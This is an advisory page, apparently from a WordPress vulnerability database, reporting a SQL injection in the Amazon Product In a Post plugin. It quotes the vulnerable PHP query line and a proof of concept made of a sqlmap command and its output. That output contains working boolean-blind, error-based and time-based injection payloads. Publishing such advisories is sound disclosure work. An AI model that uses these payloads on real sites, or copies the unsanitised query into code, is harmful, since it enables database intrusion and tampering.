Amazon Product In a Post Plugin - SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
amazon-product-in-a-post.php - this plugin takes raw user values and uses it delete from the database. This query can be manipulated to perform SQL injection attacks.

Line 40:
$tempswe = $wpdb->query("DELETE FROM {$wpdb->prefix}amazoncache WHERE Cache_id ='{$wp->query_vars['appip-cache-id']}' LIMIT 1;");
Proof of Concept
sqlmap -u "http://TARGET/index.php?appip-cache-del=dodel&appip-cache-id=2" -p appip-cache-id --dbms mysql

[02:00:47] [INFO] heuristic (basic) test shows that GET parameter 'appip-cache-id' might be injectable (possible DBMS: 'MySQL')
[02:00:47] [INFO] heuristic (XSS) test shows that GET parameter 'appip-cache-id' might be vulnerable to XSS attacks
[02:00:54] [INFO] GET parameter 'appip-cache-id' seems to be 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)' injectable 
[02:00:54] [INFO] GET parameter 'appip-cache-id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable 
sqlmap identified the following injection points with a total of 271 HTTP(s) requests:
---
Parameter: appip-cache-id (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: appip-cache-del=dodel&appip-cache-id=2' RLIKE (SELECT (CASE WHEN (1323=1323) THEN 2 ELSE 0x28 END)) AND 'kTyF'='kTyF

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: appip-cache-del=dodel&appip-cache-id=2' AND (SELECT 4609 FROM(SELECT COUNT(*),CONCAT(0x7162627a71,(SELECT (CASE WHEN (4609=4609) THEN 1 ELSE 0 END)),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GuOh'='GuOh

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: appip-cache-del=dodel&appip-cache-id=2' AND (SELECT * FROM (SELECT(SLEEP(5)))hekc) AND 'oIki'='oIki
---

Affects

Plugin amazon-product-in-a-post-plugin

References

URL https://wordpress.org/plugins/amazon-product-in-a-post-plugin/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Jamie
Views 155
Verified No
WPVDB ID 7970

Timeline

Publicly Published 2015-05-07 (over 1 year ago)
Added 2015-05-08 (over 1 year ago)
Last Updated 2015-05-15 (over 1 year ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.